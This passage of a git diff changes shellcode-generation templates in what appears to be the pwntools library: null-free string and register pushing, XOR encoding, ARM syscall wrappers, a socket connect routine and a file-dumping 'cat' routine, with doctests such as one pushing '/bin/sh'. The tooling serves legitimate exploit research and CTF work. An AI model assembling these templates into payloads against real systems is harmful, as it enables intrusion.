b/pwnlib/shellcraft/templates/amd64/push.asm index 051a0d5e3..b5b34f254 100644 --- a/pwnlib/shellcraft/templates/amd64/push.asm +++ b/pwnlib/shellcraft/templates/amd64/push.asm @@ -1,7 +1,9 @@ <% from pwnlib.util import packing from pwnlib.shellcraft import amd64 + from pwnlib.shellcraft.amd64 import pushstr from pwnlib import constants + from pwnlib.shellcraft.registers import amd64 as regs from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context import re %> @@ -22,39 +24,42 @@ Example: >>> print pwnlib.shellcraft.amd64.push(0).rstrip() /* push 0 */ - push 0x1 + push 1 dec byte ptr [rsp] >>> print pwnlib.shellcraft.amd64.push(1).rstrip() /* push 1 */ - push 0x1 + push 1 >>> print pwnlib.shellcraft.amd64.push(256).rstrip() /* push 256 */ - push 0x1010201 - xor dword ptr [rsp], 0x1010301 + push 0x1010201 ^ 0x100 + xor dword ptr [rsp], 0x1010201 >>> with context.local(os = 'linux'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ - push 0x1 + push 1 >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ - push 0x4 + push 4 <% value_orig = value - if isinstance(value, (str, unicode)): + is_reg = False + if value in regs: + is_reg = True + if not is_reg and isinstance(value, (str, unicode)): try: with ctx.local(arch = 'amd64'): value = constants.eval(value) except (ValueError, AttributeError): - pass + pass %> - -% if isinstance(value, (int,long)): +%if not is_reg: /* push ${repr(value_orig)} */ ${re.sub(r'^\s*/.*\n', '', amd64.pushstr(packing.pack(value), False), 1)} % else: push ${value} % endif + diff --git a/pwnlib/shellcraft/templates/amd64/pushad.asm b/pwnlib/shellcraft/templates/amd64/pushad.asm new file mode 100644 index 000000000..9a73bd594 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/pushad.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Push all of the registers onto the stack which i386 pushad does, +in the same order. + + push rax + push rcx + push rdx + push rbp + push rsp + push rbp + push rsi + push rdi diff --git a/pwnlib/shellcraft/templates/amd64/pushstr.asm b/pwnlib/shellcraft/templates/amd64/pushstr.asm index 4ec1611c5..9f679316e 100644 --- a/pwnlib/shellcraft/templates/amd64/pushstr.asm +++ b/pwnlib/shellcraft/templates/amd64/pushstr.asm @@ -1,4 +1,7 @@ -<% from pwnlib.util import lists, packing, fiddling %>\ +<% + from pwnlib.util import lists, packing, fiddling + from pwnlib.shellcraft import pretty +%>\ <%page args="string, append_null = True"/> <%docstring> Pushes a string onto the stack without using @@ -8,36 +11,38 @@ Example: >>> print shellcraft.amd64.pushstr('').rstrip() /* push '\x00' */ - push 0x1 + push 1 dec byte ptr [rsp] >>> print shellcraft.amd64.pushstr('a').rstrip() /* push 'a\x00' */ push 0x61 >>> print shellcraft.amd64.pushstr('aa').rstrip() /* push 'aa\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0x6161 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaa').rstrip() /* push 'aaa\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0x616161 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ push 0x61616161 >>> print shellcraft.amd64.pushstr('aaa\xc3').rstrip() /* push 'aaa\xc3\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + mov rax, 0x101010101010101 + push rax + mov rax, 0x101010101010101 ^ 0xc3616161 + xor [rsp], rax >>> print shellcraft.amd64.pushstr('aaa\xc3', append_null = False).rstrip() /* push 'aaa\xc3' */ - push 0x... + push -0x3c9e9e9f >>> print shellcraft.amd64.pushstr('\xc3').rstrip() /* push '\xc3\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0xc3 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ - push 0x...c3 + push -0x3d >>> with context.local(): ... context.arch = 'amd64' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) @@ -56,7 +61,7 @@ Args: append_null (bool): Whether to append a single NULL-byte before pushing. <% - if append_null: + if append_null and not string.endswith('\x00'): string += '\x00' if not string: return @@ -68,14 +73,12 @@ Args: extend = '\xff' else: extend = '\x00' - - def pretty(n): - return hex(n & (2 ** 64 - 1)) %>\ /* push ${repr(string)} */ % for word in lists.group(8, string, 'fill', extend)[::-1]: <% sign = packing.u64(word, endian='little', sign='signed') + sign32 = packing.u32(word[:4], bits=32, endian='little', sign='signed') %>\ % if sign in [0, 0xa]: push ${pretty(sign + 1)} @@ -85,16 +88,16 @@ Args: % elif -0x80000000 <= sign <= 0x7fffffff and okay(word[:4]): push ${pretty(sign)} % elif okay(word): - mov rax, ${hex(sign)} + mov rax, ${pretty(sign)} push rax -% elif word[4:] == '\x00\x00\x00\x00': +% elif sign32 > 0 and word[4:] == '\x00\x00\x00\x00': <% a,b = fiddling.xor_pair(word[:4], avoid = '\x00\n') - a = packing.u32(a, endian='little', sign='unsigned') + a = packing.u32(a, endian='little', sign='signed') b = packing.u32(b, endian='little', sign='unsigned') %>\ - push ${pretty(a)} - xor dword ptr [rsp], ${pretty(b)} + push ${pretty(a)} ^ ${pretty(sign)} + xor dword ptr [rsp], ${pretty(a)} % else: <% a,b = fiddling.xor_pair(word, avoid = '\x00\n') @@ -103,7 +106,7 @@ Args: %>\ mov rax, ${pretty(a)} push rax - mov rax, ${pretty(b)} + mov rax, ${pretty(a)} ^ ${pretty(sign)} xor [rsp], rax % endif % endfor diff --git a/pwnlib/shellcraft/templates/amd64/pushstr_array.asm b/pwnlib/shellcraft/templates/amd64/pushstr_array.asm new file mode 100644 index 000000000..d76cf0eab --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/pushstr_array.asm @@ -0,0 +1,38 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pushes an array/envp-style array of pointers onto the stack. + +Arguments: + reg(str): + Destination register to hold the pointer. + array(str,list): + Single argument or list of arguments to push. + NULL termination is normalized so that each argument + ends with exactly one NULL byte. + +<%page args="reg, array"/> +<% +if isinstance(array, (str)): + array = [array] + +array_str = '' + +# Normalize all of the arguments' endings +array = [arg.rstrip('\x00') + '\x00' for arg in array] +array_str = ''.join(array) + +word_size = 8 +offset = len(array_str) + word_size + +%>\ + /* push argument array ${repr(array)} */ + ${amd64.pushstr(array_str)} + ${amd64.mov(reg, 0)} + push ${reg} /* null terminate */ +% for i,arg in enumerate(reversed(array)): + ${amd64.mov(reg, offset + word_size*i - len(arg))} + add ${reg}, rsp + push ${reg} /* ${repr(arg)} */ + <% offset -= len(arg) %>\ +% endfor + ${amd64.mov(reg,'rsp')} diff --git a/pwnlib/shellcraft/templates/amd64/setregs.asm b/pwnlib/shellcraft/templates/amd64/setregs.asm index 8521c9726..c3e5f140c 100644 --- a/pwnlib/shellcraft/templates/amd64/setregs.asm +++ b/pwnlib/shellcraft/templates/amd64/setregs.asm @@ -1,6 +1,6 @@ <% from pwnlib.regsort import regsort - from pwnlib.shellcraft import registers + from pwnlib.shellcraft import registers, eval from pwnlib.shellcraft.amd64 import mov %> <%page args="reg_context, stack_allowed = True"/> @@ -16,18 +16,57 @@ Example: >>> print shellcraft.setregs({'rax':1, 'rbx':'rax'}).rstrip() mov rbx, rax - push 0x1 + push 1 + pop rax + >>> print shellcraft.setregs({'rax': 'SYS_write', 'rbx':'rax'}).rstrip() + mov rbx, rax + push (SYS_write) /* 1 */ pop rax >>> print shellcraft.setregs({'rax':'rbx', 'rbx':'rax', 'rcx':'rbx'}).rstrip() mov rcx, rbx xchg rax, rbx + >>> print shellcraft.setregs({'rax':1, 'rdx':0}).rstrip() + push 1 + pop rax + cdq /* rdx=0 */ +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} + +eax = reg_context.get('rax', None) +edx = reg_context.get('rdx', None) +cdq = False + +if isinstance(eax, str): + try: + eax = eval(eax) + except NameError: + pass -% for how, src, dst in regsort(reg_context, registers.amd64): +if isinstance(edx, str): + try: + edx = eval(edx) + except NameError: + pass + +if isinstance(eax, int) and isinstance(edx, int) and eax >> 63 == edx: + cdq = True + reg_context.pop('rdx') + +sorted_regs = regsort(reg_context, registers.amd64) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, src, dst in sorted_regs: % if how == 'xchg': xchg ${src}, ${dst} % else: ${mov(src, dst)} % endif % endfor +% if cdq: + cdq /* rdx=0 */ +% endif +% endif diff --git a/pwnlib/shellcraft/templates/amd64/strcpy.asm b/pwnlib/shellcraft/templates/amd64/strcpy.asm new file mode 100644 index 000000000..b193c07f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/strcpy.asm @@ -0,0 +1,32 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Copies a string + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop rax\n' + >>> sc += shellcraft.amd64.strcpy('rsp', 'rax') + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 32) + >>> sc += shellcraft.amd64.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).recvline() + 'Hello, world\n' + +<%page args="dst, src"/> + ${setregs({'rcx': -1, + 'rdi': src, + 'rsi': dst, + 'rax': 0})} + push rdi + repnz scas al, BYTE PTR [rdi] + pop rdi + xchg rdi, rsi + inc rcx + neg rcx + rep movs BYTE PTR [rdi], BYTE PTR [rsi] diff --git a/pwnlib/shellcraft/templates/amd64/strlen.asm b/pwnlib/shellcraft/templates/amd64/strlen.asm new file mode 100644 index 000000000..5191d4c8f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/strlen.asm @@ -0,0 +1,35 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.amd64 import mov, pushstr, setregs +from pwnlib import constants +%> +<%docstring> +Calculate the length of the specified string. + +Arguments: + string(str): Register or address with the string + reg(str): Named register to return the value in, + rcx is the default. + +Example: + + >>> sc = 'jmp get_str\n' + >>> sc += 'pop_str: pop rdi\n' + >>> sc += shellcraft.amd64.strlen('rdi', 'rax') + >>> sc += 'push rax;' + >>> sc += shellcraft.amd64.linux.write(1, 'rsp', 8) + >>> sc += shellcraft.amd64.linux.exit(0) + >>> sc += 'get_str: call pop_str\n' + >>> sc += '.asciz "Hello, world\\n"' + >>> run_assembly(sc).unpack() == len('Hello, world\n') + True + +<%page args="string, reg='rcx'"/> + ${setregs({'rcx': -1, + 'rdi': string, + 'rax': 0})} + repnz scas al, BYTE PTR [rdi] + inc rcx + inc rcx + neg rcx + ${mov(reg, 'rcx')} diff --git a/pwnlib/shellcraft/templates/amd64/xor.asm b/pwnlib/shellcraft/templates/amd64/xor.asm new file mode 100644 index 000000000..e9a9b6f32 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/xor.asm @@ -0,0 +1,82 @@ +<% + from pwnlib.shellcraft import pretty, common, amd64, registers + from pwnlib.util.packing import pack, unpack + from pwnlib.context import context as ctx + from pwnlib.log import getLogger +%> +<%page args="key, address, count"/> +<%docstring> +XORs data a constant value. + +Args: + key (int,str): XOR key either as a 8-byte integer, + If a string, length must be a power of two, + and not longer than 8 bytes. + Alternately, may be a register. + address (int): Address of the data (e.g. 0xdead0000, 'esp') + count (int): Number of bytes to XOR, or a register containing + the number of bytes to XOR. + +Example: + + >>> sc = shellcraft.read(0, 'rsp', 32) + >>> sc += 'mov rbx, [rsp]\n' + >>> sc += 'mov rdx, rax' + >>> sc += shellcraft.xor('rbx', 'rsp', 'rax') + >>> sc += shellcraft.write(1, 'rsp', 'rdx') + >>> io = run_assembly(sc) + >>> io.send(cyclic(32)) + >>> io.recv() == xor(cyclic(context.bytes), cyclic(32)) + True + +<% +log = getLogger('pwnlib.shellcraft.templates.amd64.xor') + +# By default, assume the key is a register +key_size = ctx.bytes +key_pretty = key + +key_register = registers.get_register(key) + +if key_register: + assert key_register.bytes == ctx.bytes +else: + key_str = key + key_int = key + + if isinstance(key, int): + key_str = pack(key, bytes=4) + else: + key_int = unpack(key, 'all') + + if len(key_str) > ctx.bytes: + log.error("Key %s is too large (max %i bytes)" % (pretty(key), ctx.bytes)) + + if len(key_str) not in (1,2,4): + log.error("Key length must be a power of two (got %s)" % pretty(key)) + + key_size = len(key_str) + key_pretty = pretty(key_int) + +if count == 0 or key_size == 0: + return '/* noop xor */' + +start = common.label('start') + +## Determine the move size +word_name = {1:'BYTE', 2:'WORD', 4:'DWORD', 8:'QWORD'}[key_size] + +## Set up the register context +regctx = {'rax': count, 'rcx': address} +if key_register and key_register.name in regctx: + regctx['rbx'] = key + key_pretty = 'rbx' +%> + /* xor(${pretty(key)}, ${pretty(address)}, ${pretty(count)}) */ + ${amd64.setregs(regctx)} + add rax, rcx +${start}: + xor ${word_name} PTR [rcx], ${key_pretty} + add rcx, ${key_size} + cmp rcx, rax + jb ${start} diff --git a/pwnlib/shellcraft/templates/arm/crash.asm b/pwnlib/shellcraft/templates/arm/crash.asm new file mode 100644 index 000000000..f02102f8e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/crash.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft.arm import mov %> +<%docstring> +Crash. + +Example: + + >>> run_assembly(shellcraft.crash()).poll(True) + -11 + + pop {r0-r12,lr} + ${mov('sp', 0)} + add pc, sp, #0 diff --git a/pwnlib/shellcraft/templates/arm/itoa.asm b/pwnlib/shellcraft/templates/arm/itoa.asm new file mode 100644 index 000000000..91c87b724 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/itoa.asm @@ -0,0 +1,75 @@ +<% +from pwnlib.shellcraft import pretty, value, common, registers +from pwnlib.shellcraft.arm import mov, pushstr, udiv_10, setregs +from pwnlib import constants +%> +<%docstring> +Converts an integer into its string representation, and pushes it +onto the stack. Uses registers r0-r5. + +Arguments: + v(str, int): + Integer constant or register that contains the value to convert. + alloca + +Example: + + >>> sc = shellcraft.arm.mov('r0', 0xdeadbeef) + >>> sc += shellcraft.arm.itoa('r0') + >>> sc += shellcraft.arm.linux.write(1, 'sp', 32) + >>> run_assembly(sc).recvuntil('\x00') + '3735928559\x00' + +<%page args="v, buffer='sp', allocate_stack=True"/> +<% +itoa_loop = common.label('itoa_loop') +size_loop = common.label('size_loop') +one_char = common.label('one_char') +assert v in registers.arm +%>\ + /* atoi(${pretty(v,0)}) */ +%if allocate_stack and buffer=='sp': + sub sp, sp, 0x10 +%endif +## REGISTER USAGE +## +## r0: Value (also used in udiv_10) +## r1: Used in udiv_10 +## r2: Used in udiv_10 +## r3: Length of string, current character +## r4: Buffer pointer +## r5: Remainder + ${setregs({'r0': v, + 'r3': 0, + 'r4': buffer})} +## Save for later + push {r0} +## Calculate how many characters are needed. +## e.g. 0 -> 1 +## 1 -> 1 +## 23 -> 2 +## 1234 -> 4 +${size_loop}: + add r3, r3, 1 + ${udiv_10('r0')} + cmp r0, 1 + bhs ${size_loop} +## Calculate the end of the buffer and null-terminate +## N.B. r0 == 0 here + add r3, r4, r3 + strb r0, [r3, #1] +## Grab saved "original value" off the stack + pop {r0} +${itoa_loop}: + ${mov('r5', 'r0')} /* save before division */ + ${udiv_10('r0')} +## Multiply back by 10 to get remainder + /* multiply by 10 to get remainder in r5 */ + ${mov('r1', 10)} + umull r1, r2, r1, r0 + sub r5, r5, r1 + /* store the byte, decrement, check complete */ + add r5, r5, ${ord('0')} + strb r5, [r3, #-1]! + cmp r3, r4 + bgt ${itoa_loop} diff --git a/pwnlib/shellcraft/templates/arm/linux/accept.asm b/pwnlib/shellcraft/templates/arm/linux/accept.asm new file mode 100644 index 000000000..b9fc47e61 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/access.asm b/pwnlib/shellcraft/templates/arm/linux/access.asm new file mode 100644 index 000000000..0abd78bbd --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/arm/linux/acct.asm b/pwnlib/shellcraft/templates/arm/linux/acct.asm new file mode 100644 index 000000000..fdae78f43 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/arm/linux/alarm.asm b/pwnlib/shellcraft/templates/arm/linux/alarm.asm new file mode 100644 index 000000000..54e0def09 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/arm/linux/bind.asm b/pwnlib/shellcraft/templates/arm/linux/bind.asm new file mode 100644 index 000000000..20a09c555 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/brk.asm b/pwnlib/shellcraft/templates/arm/linux/brk.asm new file mode 100644 index 000000000..e8f134333 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm b/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm new file mode 100644 index 000000000..e51dc2d80 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/cacheflush.asm @@ -0,0 +1,31 @@ +<%docstring> +Invokes the cache-flush operation, without using any NULL or newline bytes. + +Effectively is just: + + mov r0, #0 + mov r1, #-1 + mov r2, #0 + swi 0x9F0002 + +How this works: + + ... However, SWI generates a software interrupt and to the + interrupt handler, 0x9F0002 is actually data and as a result will + not be read via the instruction cache, so if we modify the argument + to SWI in our self-modifyign code, the argument will be read + correctly. + + adr r6, cacheflush + movw r5, 0xffff + add r5, r5, 3 + strh r5, [r6] + eor r7, r7, r7 + push {r7, lr} + sub r7, r7, #1 + push {r7} + add r7, r7, #1 + push {r7} + pop {r0, r1, r2, lr} +cacheflush: + swimi 0x9f4141 diff --git a/pwnlib/shellcraft/templates/arm/linux/cat.asm b/pwnlib/shellcraft/templates/arm/linux/cat.asm new file mode 100644 index 000000000..3da5b7e73 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/cat.asm @@ -0,0 +1,19 @@ +<% + from pwnlib import constants + from pwnlib.shellcraft import arm +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> f = tempfile.mktemp() + >>> write(f, 'FLAG\n') + >>> run_assembly(shellcraft.arm.linux.cat(f)).recvline() + 'FLAG\n' + + + ${arm.pushstr(filename)} + ${arm.linux.open('sp', 0, int(constants.O_RDONLY))} + ${arm.linux.sendfile(fd, 'r0', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chdir.asm b/pwnlib/shellcraft/templates/arm/linux/chdir.asm new file mode 100644 index 000000000..794d92b41 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chmod.asm b/pwnlib/shellcraft/templates/arm/linux/chmod.asm new file mode 100644 index 000000000..303774e2e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chown.asm b/pwnlib/shellcraft/templates/arm/linux/chown.asm new file mode 100644 index 000000000..5afca31b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/chroot.asm b/pwnlib/shellcraft/templates/arm/linux/chroot.asm new file mode 100644 index 000000000..8c2751958 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm b/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm new file mode 100644 index 000000000..e5aa96315 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm new file mode 100644 index 000000000..66f7ee213 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm new file mode 100644 index 000000000..e3f1f75d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm b/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm new file mode 100644 index 000000000..75f7f6cd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/clone.asm b/pwnlib/shellcraft/templates/arm/linux/clone.asm new file mode 100644 index 000000000..84ad27eb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/close.asm b/pwnlib/shellcraft/templates/arm/linux/close.asm new file mode 100644 index 000000000..8189d7dea --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/connect.asm b/pwnlib/shellcraft/templates/arm/linux/connect.asm new file mode 100644 index 000000000..640f41291 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/connect.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft.arm import push, mov, pushstr + from pwnlib.shellcraft.arm.linux import syscall + from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect + from pwnlib.util.net import sockaddr +%> +<%page args="host, port, network='ipv4'"/> +<%docstring> + Connects to the host on the specified port. + Network is either 'ipv4' or 'ipv6'. + Leaves the connected socket in R6. + +<% + sockaddr, addr_len, address_family = sockaddr(host, port, network) +%>\ +/* open new socket */ + ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)} + +/* save opened socket */ + ${mov('r6', 'r0')} + +/* push sockaddr, connect() */ + ${pushstr(sockaddr, False)} + ${syscall(SYS_connect, 'r6', 'sp', addr_len)} + +/* Socket that is maybe connected is in r6 */ diff --git a/pwnlib/shellcraft/templates/arm/linux/creat.asm b/pwnlib/shellcraft/templates/arm/linux/creat.asm new file mode 100644 index 000000000..8dbc754d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dir.asm b/pwnlib/shellcraft/templates/arm/linux/dir.asm new file mode 100644 index 000000000..f10e0dda8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dir.asm @@ -0,0 +1,21 @@ +<% from pwnlib.shellcraft import arm, pretty, common %> +<%page args="in_fd = 'r6', size = 0x800, allocate_stack = True"/> +<%docstring> Reads to the stack from a directory. + +Args: + in_fd (int/str): File descriptor to be read from. + size (int): Buffer size. + allocate_stack (bool): allocate 'size' bytes on the stack. + +You can optioanlly shave a few bytes not allocating the stack space. + +The size read is left in eax. + +<% + getdents_loop = common.label('getdents_loop') +%> +%if allocate_stack: + sub sp, sp, ${pretty(size)} +%endif +${getdents_loop}: + ${arm.linux.getdents(in_fd, 'sp', size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup.asm b/pwnlib/shellcraft/templates/arm/linux/dup.asm new file mode 100644 index 000000000..a5b143fa2 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup2.asm b/pwnlib/shellcraft/templates/arm/linux/dup2.asm new file mode 100644 index 000000000..92fc73722 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/arm/linux/dup3.asm b/pwnlib/shellcraft/templates/arm/linux/dup3.asm new file mode 100644 index 000000000..77bf5966c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> 